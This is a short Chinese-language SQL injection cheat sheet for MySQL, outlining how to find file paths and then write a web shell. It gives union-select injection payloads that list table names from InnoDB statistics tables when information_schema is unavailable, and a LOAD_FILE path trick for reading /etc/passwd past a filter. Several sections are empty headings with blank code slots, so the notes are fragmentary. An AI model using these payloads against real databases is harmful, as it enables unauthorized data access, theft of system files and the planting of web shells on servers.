一、找路径
1.报错
tips:
有时候information_schema.tables
不能用时,在MySQL 5.6及以上版本中可以使用以下表12?id=1' union select 1,group_concat(table_name) from mysql.innodb_table_stats where database_name=schema()%23&Submit=Submit%23?id=1' union select 1,group_concat(table_name) from mysql.innodb_index_stats where database_name=schema()%23&Submit=Submit%23
2.phpinfo
3.load_file
|
|
tips:
有时候过滤了敏感路径可以试试这样:1SELECT LOAD_FILE('/etc/sb/../passwd');
4.数组
|
|
5.通过mysql函数 查找mysql安装目录
|
|
二、写shell
1.获取mysql.user
和文件权限
|
|
2.写shell
|
|
最好还是把内容编码下。